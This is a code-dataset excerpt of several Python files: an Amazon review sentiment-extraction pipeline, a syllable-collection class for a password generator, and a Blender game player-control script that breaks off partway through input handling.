gc.remove_all_cancelled_events()\n\n","repo_name":"Kortemme-Lab/klab","sub_path":"klab/google/gcalendar.py","file_name":"gcalendar.py","file_ext":"py","file_size_in_byte":43995,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10897686873","text":"import os\nimport csv\nimport argparse\nimport pandas as pd\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nfrom textblob import TextBlob\nfrom tqdm import tqdm\nfrom math import exp\nfrom itertools import chain\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input', type=str,\n help='Input data - amazon reviews data .json.gz')\n parser.add_argument('-c', '--concepts', type=str,\n default='~/data/data-concept/data-concept-instance-relations.txt')\n parser.add_argument('-p', '--positive_opinions', type=str,\n default='~/data/opinion-lexicon-English/positive-words.txt')\n parser.add_argument('-n', '--negative_opinions', type=str,\n default='~/data/opinion-lexicon-English/negative-words.txt')\n parser.add_argument('-o', '--out', type=str,\n help='Output directory, final output including: rating.txt, sentiment.txt')\n parser.add_argument('--num_top_freq_aspect', type=int, default=2000)\n parser.add_argument('--num_top_corr_aspect', type=int, default=500)\n return parser.parse_args()\n\n\ndef parse_line(line, n_grams=[1, 2, 3, 4]):\n tokens = word_tokenize(line)\n results = []\n for i in n_grams:\n if i == 1:\n results += tokens\n elif len(tokens) >= i:\n results += [' '.join(tokens[j:j+i])\n for j in range(len(tokens) - i + 1)]\n return results\n\n\ndef get_sentiment(polarity):\n if polarity > 0:\n return 1\n elif polarity < 0:\n return -1\n return 0\n\n\ndef compute_feature_quality_score(sentiment, N=5):\n return 1. 
+ (N - 1) / (1 + exp(-sentiment))\n\n\ndef chainer(s, sep=','):\n return list(chain.from_iterable(s.str.split(sep)))\n\n\ndef most_frequent(elements, counter, exclude=[]):\n element_freq = [counter[element] for element in elements if element not in exclude]\n if len(element_freq) == 0:\n return None\n return elements[element_freq.index(max(element_freq))]\n\n\ndef main(args):\n if not os.path.exists(args.out):\n os.makedirs(args.out)\n # load data\n print('Load data')\n df = pd.read_json(args.input, lines=True)\n print('Export ratings')\n ratings = df.loc[:, ['reviewerID', 'asin', 'overall', 'unixReviewTime']]\n ratings.to_csv(\n os.path.join(args.out, 'rating.txt'), header=False, index=False)\n ratings['id'] = ratings['reviewerID'].map(\n str) + '-' + ratings['asin'].map(str)\n ratings = ratings.set_index('id')\n print('Export text')\n reviews = df[['reviewerID', 'asin', 'reviewText']]\n print('Lowercase all text')\n df['reviewText'] = df['reviewText'].str.lower()\n reviews.to_csv(os.path.join(\n args.out, 'review.txt'), sep='\\t', header=False, index=False)\n print('Load concepts')\n concepts = pd.read_csv(args.concepts, header=None, sep='\\t')\n concepts = list(set(concepts[0].tolist() + concepts[1].tolist()))\n print('Exclude stopwords')\n stop_words = set(stopwords.words('english'))\n concepts = [tok for tok in concepts if tok not in stop_words]\n all_text = ' '.join(df['reviewText'].tolist())\n tokens = [tok for tok in parse_line(all_text, n_grams=[1])]\n token_counter = Counter(tokens)\n concept_freq = pd.DataFrame(data={'concept': concepts})\n concept_freq['count'] = concept_freq['concept'].map(token_counter)\n print('Sort concept descending order')\n concept_freq = concept_freq.sort_values(\n by=['count'], ascending=False).reset_index(drop=True)\n print('Backup concepts count')\n concept_freq.to_csv(os.path.join(\n args.out, 'concept.cnt'), header=False, index=False)\n print('Export top %d concepts' % args.num_top_freq_aspect)\n top_freq_aspects = concept_freq[:args.num_top_freq_aspect]\n top_freq_aspects.to_csv(os.path.join(\n args.out, 'top_freq_aspects.txt'), header=False, index=False)\n top_freq_aspects = top_freq_aspects['concept'].tolist()\n # Exporting sentence sentiment\n with open(os.path.join(args.out, 'sentences.txt'), 'w') as f:\n for _, row in tqdm(df.iterrows(), desc='Exporting sentence sentiment'):\n review = TextBlob(row['reviewText'])\n for sentence in review.sentences:\n s = sentence.tokens\n if len(s) > 0 and s[-1] == '.':\n s.remove('.') # remove fullstop\n if len(s) > 0:\n s = ' '.join(s)\n f.write('{}\\t{}\\t{}\\t{}\\n'.format(\n row['reviewerID'], row['asin'], s, get_sentiment(sentence.sentiment.polarity)))\n # Load sentences\n sentence_df = pd.read_csv(os.path.join(args.out, 'sentences.txt'), sep='\\t', header=None,\n names=['reviewerID', 'asin', 'sentence', 'sentiment'])\n # Exporting aspect sentiment\n with open(os.path.join(args.out, 'aspect_sentiment.txt'), 'w') as f:\n for user, item, sentence, sentiment in tqdm(zip(sentence_df['reviewerID'], sentence_df['asin'], sentence_df['sentence'], sentence_df['sentiment']), desc='Exporting aspect sentiment'):\n for tok in parse_line(str(sentence), n_grams=[1]):\n if tok in top_freq_aspects:\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\n'.format(\n user, item, sentence, tok, sentiment))\n # Load aspect sentiment\n aspect_sentiments = pd.read_csv(os.path.join(args.out, 'aspect_sentiment.txt'), sep='\\t',\n usecols=[0, 1, 3, 4], header=None,\n names=['reviewerID', 'asin', 'aspect', 'sentiment'])\n print('compute user, item 
aspect sentiment')\n aspect_sentiments = aspect_sentiments.groupby(\n by=['reviewerID', 'asin', 'aspect']).sum().reset_index()\n tqdm.pandas(desc='compute aspect score')\n aspect_sentiments['aspect_score'] = aspect_sentiments['sentiment'].progress_apply(\n lambda x: compute_feature_quality_score(x))\n print('export aspect scores to file')\n aspect_sentiments.to_csv(os.path.join(\n args.out, 'aspect_scores.csv'), index=False)\n aspect_sentiments['id'] = aspect_sentiments['reviewerID'].map(\n str) + '-' + aspect_sentiments['asin'].map(str)\n ratings['id'] = ratings['reviewerID'].map(\n str) + '-' + ratings['asin'].map(str)\n ratings = ratings.set_index('id')\n print('map ratings')\n aspect_sentiments['overall'] = aspect_sentiments['id'].map(\n ratings['overall'])\n print('compute correlation')\n aspect_sentiments = aspect_sentiments[aspect_sentiments['overall'].notnull(\n )]\n rating_aspect_correlations = aspect_sentiments.groupby(by=['aspect'])[['overall', 'aspect_score']].corr(\n method='pearson').iloc[0::2, -1].reset_index()[['aspect', 'aspect_score']].sort_values(by=['aspect_score'], ascending=False).reset_index(drop=True)\n print('export rating aspect correlation scores to file')\n rating_aspect_correlations.to_csv(os.path.join(\n args.out, 'rating_aspect_correlations.csv'), index=False, header=False)\n print('export top {} aspects to file'.format(args.num_top_corr_aspect))\n top_corr_aspects = rating_aspect_correlations[:args.num_top_corr_aspect]\n top_corr_aspects[['aspect']].to_csv(\n os.path.join(args.out, 'top_correlated_aspects.txt'), index=False, header=False)\n top_corr_aspects = set(top_corr_aspects['aspect'].tolist())\n # Load opinions\n opinions = set(pd.read_csv(args.positive_opinions, header=None)[\n 0].tolist() + pd.read_csv(args.negative_opinions, header=None)[0].tolist())\n with open(os.path.join(args.out, 'sentence_aspect_opinion_sentiments.txt'), 'w') as f:\n fieldnames = ['reviewerID', 'asin', 'sentence', 'aspect',\n 'aspect_count', 'opinion', 'opinion_count', 'sentiment']\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n writer.writeheader()\n for user, item, sentence, sentiment in tqdm(zip(sentence_df['reviewerID'], sentence_df['asin'], sentence_df['sentence'], sentence_df['sentiment']), total=len(sentence_df), desc='Exporting sentence aspect opinion'):\n sentence_aspects = set()\n sentence_opinions = set()\n for tok in parse_line(str(sentence).lower(), n_grams=[1]):\n if tok in opinions:\n sentence_opinions.add(tok)\n elif tok in top_corr_aspects:\n sentence_aspects.add(tok)\n if len(sentence_aspects) > 0 and len(sentence_opinions) > 0:\n writer.writerow({\n 'reviewerID': user,\n 'asin': item,\n 'sentence': sentence,\n 'aspect': '|'.join(list(sentence_aspects)),\n 'aspect_count': len(sentence_aspects),\n 'opinion': '|'.join(list(sentence_opinions)),\n 'opinion_count': len(sentence_opinions),\n 'sentiment': sentiment\n })\n # Export data\n data_df = pd.read_csv(os.path.join(args.out, 'sentence_aspect_opinion_sentiments.txt'))\n data_df = data_df[data_df['aspect'].notnull() & data_df['opinion'].notnull()]\n aspects = chainer(data_df['aspect'], '|')\n aspect_counter = Counter(aspects)\n opinions = chainer(data_df['opinion'], '|')\n opinion_counter = Counter(opinions)\n tqdm.pandas(desc='Spliting aspect')\n data_df['split_aspect'] = data_df['aspect'].progress_apply(lambda x: str(x).split('|'))\n tqdm.pandas(desc='Choosing most freq aspect')\n data_df['most_freq_aspect'] = data_df['split_aspect'].progress_apply(lambda x: most_frequent(x, aspect_counter))\n 
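# Each sentence may mention several aspects; the corpus-wide most frequent one is\n    # kept as the sentence's representative aspect, and the representative opinion\n    # below is chosen the same way while excluding the chosen aspect's own tokens.\n    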
data_df['split_opinion'] = data_df['opinion'].apply(lambda x: str(x).split('|'))\n data_df['most_freq_opinion'] = data_df.apply(lambda row: most_frequent(row['split_opinion'], opinion_counter, row['most_freq_aspect'].split() + [row['most_freq_aspect']]), axis=1)\n print('Filter sentences without opinion')\n data_df = data_df[data_df['most_freq_opinion'].notnull()]\n data_df['aspect_term'] = data_df['most_freq_aspect'].apply(lambda x: '_'.join(str(x).split()))\n data_df['opinion_term'] = data_df['most_freq_opinion'].apply(lambda x: '_'.join(str(x).split()))\n data_df['sentence'] = data_df.apply(lambda row: ' '.join(word_tokenize(str(row['sentence']).replace(row['most_freq_aspect'], row['aspect_term']).replace(row['most_freq_opinion'], row['opinion_term']))), axis=1)\n data_df['aspect'] = data_df['aspect_term']\n data_df['opinion'] = data_df['opinion_term']\n tqdm.pandas(desc='Locating aspect position')\n data_df['aspect_pos'] = data_df.progress_apply(lambda row: word_tokenize(row['sentence']).index(str(row['aspect'])), axis=1)\n tqdm.pandas(desc='Locating opinion position')\n data_df['opinion_pos'] = data_df.progress_apply(lambda row: word_tokenize(row['sentence']).index(str(row['opinion'])), axis=1)\n tqdm.pandas(desc='Getting sentence length')\n data_df['sentence_len'] = data_df['sentence'].progress_apply(lambda x: len(str(x).split()))\n print('Export sentence with aspect and opinion positions to file')\n data_df[['reviewerID','asin','sentence','sentence_len','aspect','aspect_pos','opinion','opinion_pos']].to_csv(os.path.join(args.out, 'data.csv'), index=False)\n tqdm.pandas(desc='Grouping aspect opinion sentiment')\n data_df['aspect_opinion_sentiment'] = data_df.progress_apply(lambda row: '{}:{}:{}'.format(row['aspect'], row['opinion'], row['sentiment']), axis=1)\n print('Export efm sentiment file')\n efm_sentiment = data_df.groupby(['reviewerID', 'asin'])['aspect_opinion_sentiment'].apply(list).reset_index()\n efm_sentiment['aspect_opinion_sentiment'] = efm_sentiment['aspect_opinion_sentiment'].apply(lambda x: ','.join([str(i) for i in x]))\n with open(os.path.join(args.out, 'sentiment.txt'), 'w') as f:\n for _, row in tqdm(efm_sentiment.iterrows(), total=len(efm_sentiment), desc='Exporting sentiment data file'):\n f.write('{},{},{}\\n'.format(row['reviewerID'], row['asin'], row['aspect_opinion_sentiment']))\n print('done')\n\n\nif __name__ == '__main__':\n main(parse_arguments())\n\n","repo_name":"lthoang/construct-amazon-sentiment","sub_path":"construct_amazon_sentiment.py","file_name":"construct_amazon_sentiment.py","file_ext":"py","file_size_in_byte":12211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36514632184","text":"class SyllableCollection(list):\n def __init__(self):\n super(SyllableCollection, self).__init__()\n self.last_syllable_by_length = dict()\n self.max_syllable_length = 0\n\n def finalize(self):\n self.sort(key=lambda x: (x.length(), str(x)))\n self.last_syllable_by_length = dict()\n for i, syllable in enumerate(self):\n self.last_syllable_by_length[syllable.length()] = i\n self.max_syllable_length = self[-1].length()\n\n def last_index(self, length):\n \"\"\" return last syllables index depending \"\"\"\n length = (\n 1\n if length < 1\n else self.max_syllable_length\n if length >= self.max_syllable_length\n else length\n )\n return 
self.last_syllable_by_length[length]\n","repo_name":"elmisi/misipwgen","sub_path":"misipwgen/syllable_collection.py","file_name":"syllable_collection.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41143390597","text":"import bge\r\nfrom bge.logic import expandPath\r\nfrom mathutils import Vector\r\nfrom scripts.utils import *\r\n\r\n\"\"\" This module contains all main data processing of the player, like changing properties used all around the game, initializing values, etc. \"\"\"\r\n\r\n################################ DATA ################################\r\n\r\ndef init_libs(cont):\r\n\t\"\"\" Initializes player libraries. Only called by init_all.\r\n\t\r\n\tSCENE: current level\r\n\tOBJECT: 'data'\r\n\tFREQUENCY: once \"\"\"\r\n\t\r\n\t# Basic\r\n\town = cont.owner\r\n\t\r\n\t# Sensors\r\n\tS_always = cont.sensors[0].positive\r\n\t\r\n\t# Properties\r\n\tpath = bge.logic.expandPath(\"//libs/\")\r\n\tweapons = \"resources/weapons.blend\"\r\n\tactions = \"actors/player.blend\"\r\n\t\r\n\t############################\r\n\t######## INITIALIZE ########\r\n\t############################\r\n\t\r\n\tif S_always:\r\n\t\t\r\n\t\t### Load libs ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t\t# Load weapon meshes\r\n\t\t\tbge.logic.LibLoad(path + weapons, \"Mesh\")\r\n\t\t\tprint(\"weapons.blend meshes was successfully loaded\")\r\n\t\t\t\r\n\t\t\t# Load player actions\r\n\t\t\tbge.logic.LibLoad(path + actions, \"Action\", load_actions=True)\r\n\t\t\tprint(\"player.blend actions was successfully loaded\")\r\n\t\t\t\r\n\tpass\r\n\r\ndef init_keys(cont):\r\n\t\"\"\" Initializes the game keys based on values of globalDict. Only called by init_all.\r\n\t\r\n\tSCENE: current level\r\n\tOBJECT: 'data'\r\n\tFREQUENCY: once \"\"\"\r\n\t\r\n\t# Basic\r\n\town = cont.owner\r\n\tglobalDict = bge.logic.globalDict\r\n\t\r\n\t# Sensors\r\n\tS_always = cont.sensors[0].positive\r\n\t\r\n\t# Objects\r\n\tO_data = own\r\n\tO_collision = O_data.parent\r\n\tO_input = O_collision.childrenRecursive.get(\"input\")\r\n\t\r\n\t# Properties\r\n\tplayer_status = globalDict[\"state\"][\"current_player\"][\"status\"]\r\n\tsensors = O_input.sensors\r\n\t\r\n\t############################\r\n\t######## INITIALIZE ########\r\n\t############################\r\n\t\r\n\tif S_always:\r\n\t\t\r\n\t\t### Set the game keys ###\r\n\t\tfor key_sen in sensors:\r\n\t\t\t# For each keyboard sensor, change the key\r\n\t\t\tif type(key_sen) == bge.types.SCA_KeyboardSensor:\r\n\t\t\t\tkey_sen.key = int(globalDict[\"options\"][\"keys\"][key_sen.name])\r\n\t\t\t\t\t\r\n\t\t# Warning message\r\n\t\tprint(\"Player key config applied to\", player_status[\"name\"])\r\n\t\t\r\n\tpass\r\n\r\ndef init_all(cont):\r\n\t\"\"\" Initializes player properties based on the current game state and stored settings, including game keys.\r\n\t\r\n\tSCENE: current level\r\n\tOBJECT: 'data'\r\n\tFREQUENCY: once \"\"\"\r\n\t\r\n\t# Basic\r\n\town = cont.owner\r\n\tglobalDict = bge.logic.globalDict\r\n\t\r\n\t# Sensors\r\n\tS_always = cont.sensors[0].positive\r\n\t\r\n\t# Objects\r\n\tO_data = own\r\n\tO_collision = O_data.parent\r\n\tO_player_head = O_collision.childrenRecursive.get(\"player_head\")\r\n\tO_player_body = O_collision.childrenRecursive.get(\"player_body\")\r\n\tO_combat = O_collision.childrenRecursive.get(\"combat\")\r\n\tO_input = O_collision.childrenRecursive.get(\"input\")\r\n\tO_items = O_collision.childrenRecursive.get(\"items\")\r\n\t\r\n\t# 
Properties\r\n\tcurrent_player = globalDict[\"state\"][\"current_player\"]\r\n\tplayer_status = globalDict[\"state\"][\"current_player\"][\"status\"]\r\n\tsensors = O_input.sensors\r\n\tcurrent_item = current_player[\"item_\" + str(player_status[\"current_item\"])]\r\n\tweapons = globalDict[\"database\"][\"weapons\"]\r\n\tpath = bge.logic.expandPath(\"//../libs/\")\r\n\t\r\n\t############################\r\n\t######## INITIALIZE ########\r\n\t############################\r\n\t\r\n\tif S_always:\r\n\t\t\r\n\t\t### Load libs ###\r\n\t\tinit_libs(cont)\r\n\t\t\r\n\t\t### Set the game keys ###\r\n\t\tinit_keys(cont)\r\n\t\t\r\n\t\t### Set the globalDict props to GameObject props ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t\t# Stats\r\n\t\t\tO_data[\"name\"] = player_status[\"name\"]\r\n\t\t\tO_data[\"color\"] = player_status[\"color\"]\r\n\t\t\tO_data[\"health\"] = int(player_status[\"health\"])\r\n\t\t\tO_data[\"current_item\"] = int(player_status[\"current_item\"])\r\n\t\t\t\r\n\t\t\t# Combat\r\n\t\t\tO_combat[\"name\"] = current_item[\"name\"]\r\n\t\t\tO_combat[\"type\"] = weapons[current_item[\"name\"]][\"type\"]\r\n\t\t\tO_combat[\"shot_time\"] = float(weapons[current_item[\"name\"]][\"shot_time\"])\r\n\t\t\tO_combat[\"cocking_type\"] = int(weapons[current_item[\"name\"]][\"cocking_type\"])\r\n\t\t\tO_combat[\"cocking_time\"] = float(weapons[current_item[\"name\"]][\"cocking_time\"])\r\n\t\t\tO_combat[\"current_clip\"] = int(current_item[\"current_clip\"])\r\n\t\t\tO_combat[\"max_clip\"] = int(weapons[current_item[\"name\"]][\"max_clip\"])\r\n\t\t\tO_combat[\"ammo_stock\"] = int(current_item[\"ammo_stock\"])\r\n\t\t\tO_combat[\"damage\"] = int(weapons[current_item[\"name\"]][\"damage\"])\r\n\t\t\r\n\t\t### Change player helmet's visor color ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t\t# Green\r\n\t\t\tif O_data[\"color\"] == \"Green\":\r\n\t\t\t\tO_player_head.color = [0.0, 1.0, 0.0, 1.0]\r\n\t\t\t\tO_player_body.color = [0.0, 1.0, 0.0, 1.0]\r\n\t\t\t\t\r\n\t\t\t# Red\r\n\t\t\tif O_data[\"color\"] == \"Red\":\r\n\t\t\t\tO_player_head.color = [1.0, 0.0, 0.0, 1.0]\r\n\t\t\t\tO_player_body.color = [1.0, 0.0, 0.0, 1.0]\r\n\t\t\t\t\r\n\t\t\t# Blue\r\n\t\t\tif O_data[\"color\"] == \"Blue\":\r\n\t\t\t\tO_player_head.color = [0.0, 0.5, 1.0, 1.0]\r\n\t\t\t\tO_player_body.color = [0.0, 0.5, 1.0, 1.0]\r\n\t\t\t\t\r\n\t\t\t# Yellow\r\n\t\t\tif O_data[\"color\"] == \"Yellow\":\r\n\t\t\t\tO_player_head.color = [1.0, 1.0, 0.0, 1.0]\r\n\t\t\t\tO_player_body.color = [1.0, 1.0, 0.0, 1.0]\r\n\t\t\t\t\r\n\t\t\t# Purple\r\n\t\t\tif O_data[\"color\"] == \"Purple\":\r\n\t\t\t\tO_player_head.color = [1.0, 0.0, 1.0, 1.0]\r\n\t\t\t\tO_player_body.color = [1.0, 0.0, 1.0, 1.0]\r\n\t\t\t\t\r\n\t\t\t# Orange\r\n\t\t\tif O_data[\"color\"] == \"Orange\":\r\n\t\t\t\tO_player_head.color = [1.0, 0.5, 0.0, 1.0]\r\n\t\t\t\tO_player_body.color = [1.0, 0.5, 0.0, 1.0]\r\n\t\t\t\t\r\n\t\t\t# Other\r\n\t\t\tif O_data[\"color\"] == \"None\":\r\n\t\t\t\tO_player_head.color = [1.0, 1.0, 1.0, 1.0]\r\n\t\t\t\tO_player_body.color = [1.0, 1.0, 1.0, 1.0]\r\n\t\t\r\n\t\t### Warning message ###\r\n\t\tprint(\"Config applied to player\", player_status[\"name\"])\r\n\t\r\n\tpass\r\n\r\ndef set_move_speed(cont):\r\n\t\"\"\" Speed transition of the move speed, smoothing the movement.\r\n\t\r\n\tSCENE: current level\r\n\tOBJECT: 'data'\r\n\tFREQUENCY: continuous \"\"\"\r\n\t\r\n\town = cont.owner\r\n\t\r\n\t# Sensors\r\n\tS_always = cont.sensors[\"always_set_move_speed\"]\r\n\tS_move_v_changed = 
cont.sensors[\"move_v_changed\"].positive\r\n\tS_move_h_changed = cont.sensors[\"move_h_changed\"].positive\r\n\t\r\n\t# Objects\r\n\tO_data = own\r\n\tO_collision = own.parent\r\n\tO_input = O_collision.childrenRecursive.get(\"input\")\r\n\t\r\n\t# Properties\r\n\tmove_speed_max = 0.1\r\n\tsmooth_factor = 0.01\r\n\t\r\n\t############################\r\n\t######## INITIALIZE ########\r\n\t############################\r\n\t\r\n\t### Activate constant processing when pressing move buttons\r\n\tif S_move_v_changed or S_move_h_changed:\r\n\t\tif O_input[\"move_vertical\"] != \"none\" or O_input[\"move_horizontal\"] != \"none\":\r\n\t\t\tS_always.usePosPulseMode = True\r\n\t\r\n\t### Constant processing of move speed ###\r\n\tif S_always.positive and not O_data[\"is_busy\"]:\r\n\r\n\t\t### Speed vertical ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t\t# Up\r\n\t\t\tif O_input[\"move_vertical\"] == \"up\":\r\n\t\t\t\t\r\n\t\t\t\t# Walk\r\n\t\t\t\tif not O_input[\"is_running\"]:\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Raise if not at max speed\r\n\t\t\t\t\tif O_data[\"move_speed_v\"] < move_speed_max - 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] += smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t# Lower if was running\r\n\t\t\t\t\tif O_data[\"move_speed_v\"] > move_speed_max - 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] -= smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t# Run\r\n\t\t\t\tif O_input[\"is_running\"]:\r\n\t\t\t\t\tif O_data[\"move_speed_v\"] < move_speed_max * 2 - 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] += smooth_factor\r\n\t\t\t\r\n\t\t\t# Down\r\n\t\t\tif O_input[\"move_vertical\"] == \"down\":\r\n\t\t\t\t\r\n\t\t\t\t# Walk\r\n\t\t\t\tif not O_input[\"is_running\"]:\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Raise if not at max speed\r\n\t\t\t\t\tif O_data[\"move_speed_v\"] > -move_speed_max + 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] -= smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t# Lower if was running\r\n\t\t\t\t\tif O_data[\"move_speed_v\"] < -move_speed_max + 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] += smooth_factor\r\n\t\t\t\t\t\r\n\t\t\t\t# Run\r\n\t\t\t\tif O_input[\"is_running\"]:\r\n\t\t\t\t\tif O_data[\"move_speed_v\"] > -move_speed_max * 2 + 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] -= smooth_factor\r\n\t\t\t\r\n\t\t\t# Stop\r\n\t\t\tif O_input[\"move_vertical\"] == \"none\":\r\n\t\t\t\t\r\n\t\t\t\t# Raise\r\n\t\t\t\tif O_data[\"move_speed_v\"] < 0.0:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] += smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t# Lower\r\n\t\t\t\tif O_data[\"move_speed_v\"] > 0.0:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] -= smooth_factor\r\n\t\t\t\t\r\n\t\t\t\t# Fix when not 0\r\n\t\t\t\tif O_data[\"move_speed_v\"] >= -smooth_factor and O_data[\"move_speed_v\"] <= smooth_factor:\r\n\t\t\t\t\tO_data[\"move_speed_v\"] = 0.0\r\n\t\t\r\n\t\t### Speed horizontal ###\r\n\t\tif True:\r\n\t\t\t# Right\r\n\t\t\tif O_input[\"move_horizontal\"] == \"right\":\r\n\t\t\t\t\r\n\t\t\t\t# Walk\r\n\t\t\t\tif not O_input[\"is_running\"]:\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Raise if not at max speed\r\n\t\t\t\t\tif O_data[\"move_speed_h\"] < move_speed_max - 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] += smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t# Lower if was running\r\n\t\t\t\t\tif O_data[\"move_speed_h\"] > move_speed_max - 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] -= smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t# Run\r\n\t\t\t\tif O_input[\"is_running\"]:\r\n\t\t\t\t\tif O_data[\"move_speed_h\"] < move_speed_max * 2 - 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] += 
smooth_factor\r\n\t\t\t\r\n\t\t\t# Left\r\n\t\t\tif O_input[\"move_horizontal\"] == \"left\":\r\n\t\t\t\t\r\n\t\t\t\t# Walk\r\n\t\t\t\tif not O_input[\"is_running\"]:\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Raise if not at max speed\r\n\t\t\t\t\tif O_data[\"move_speed_h\"] > -move_speed_max + 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] -= smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t# Lower if was running\r\n\t\t\t\t\tif O_data[\"move_speed_h\"] < -move_speed_max + 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] += smooth_factor\r\n\t\t\t\t\t\r\n\t\t\t\t# Run\r\n\t\t\t\tif O_input[\"is_running\"]:\r\n\t\t\t\t\tif O_data[\"move_speed_h\"] > -move_speed_max * 2 + 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] -= smooth_factor\r\n\t\t\t\r\n\t\t\t# Stop\r\n\t\t\tif O_input[\"move_horizontal\"] == \"none\":\r\n\t\t\t\t\r\n\t\t\t\t# Raise\r\n\t\t\t\tif O_data[\"move_speed_h\"] < 0.0:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] += smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t# Lower\r\n\t\t\t\tif O_data[\"move_speed_h\"] > 0.0:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] -= smooth_factor\r\n\t\t\t\t\r\n\t\t\t\t# Fix when not 0\r\n\t\t\t\tif O_data[\"move_speed_h\"] >= -smooth_factor and O_data[\"move_speed_h\"] <= smooth_factor:\r\n\t\t\t\t\tO_data[\"move_speed_h\"] = 0.0\r\n\t\t\t\t\t\r\n\t\t### Disable processing if not pressing move buttons ###\r\n\t\tif O_data[\"move_speed_h\"] == 0.0 and O_data[\"move_speed_v\"] == 0.0:\r\n\t\t\t\r\n\t\t\tif O_input[\"move_horizontal\"] == \"none\" and O_input[\"move_vertical\"] == \"none\":\r\n\t\t\t\tS_always.usePosPulseMode = False\r\n\t\t\r\n\tpass\r\n\r\n################################ INPUT ################################\r\n\r\ndef input_to_props(cont):\r\n\t\r\n\t\"\"\" Sets the player properties based on input or interaction with other actors and elements.\r\n\t\r\n\tSCENE: current level\r\n\tOBJECT: 'input'\r\n\tFREQUENCY: input and interaction dependent \"\"\"\r\n\t\r\n\t# Basic\r\n\town = cont.owner\r\n\tglobalDict = bge.logic.globalDict\r\n\t\r\n\t# Sensors\r\n\tS_up = cont.sensors[\"up\"].positive\r\n\tS_down = cont.sensors[\"down\"].positive\r\n\tS_left = cont.sensors[\"left\"].positive\r\n\tS_right = cont.sensors[\"right\"].positive\r\n\tS_run = cont.sensors[\"run\"].positive\r\n\tS_use = cont.sensors[\"use\"].positive\r\n\tS_reload = cont.sensors[\"reload\"].positive\r\n\tS_item_1 = cont.sensors[\"item_1\"].positive\r\n\tS_item_2 = cont.sensors[\"item_2\"].positive\r\n\tS_item_3 = cont.sensors[\"item_3\"].positive\r\n\tS_item_4 = cont.sensors[\"item_4\"].positive\r\n\tS_shoot = cont.sensors[\"shoot\"].positive\r\n\t\r\n\t# Objects\r\n\tO_input = own\r\n\tO_collision = own.parent\r\n\tO_data = O_collision.childrenRecursive.get(\"data\")\r\n\tO_combat = O_collision.childrenRecursive.get(\"combat\")\r\n\t\r\n\t# Properties\r\n\treload_time = 1.9\r\n\tis_local_player = O_data[\"name\"] == globalDict[\"state\"][\"current_player\"][\"status\"][\"name\"]\r\n\t\r\n\t############################\r\n\t######## INITIALIZE ########\r\n\t############################\r\n\t\r\n\t# Active events\r\n\tif not O_data[\"is_busy\"] and is_local_player:\r\n\t\t\r\n\t\t### Item ###\r\n\t\tif O_data[\"current_action\"] == \"aiming\" and O_combat[\"timer_cock\"] > 0.0:\r\n\t\t\t\r\n\t\t\t# Item 1\r\n\t\t\tif S_item_1:\r\n\t\t\t\tO_data[\"current_item\"] = 1\r\n\t\t\t\tglobalDict[\"state\"][\"current_player\"][\"status\"][\"current_item\"] = \"1\"\r\n\t\t\t\t\r\n\t\t\t# Item 2\r\n\t\t\tif S_item_2:\r\n\t\t\t\tO_data[\"current_item\"] = 
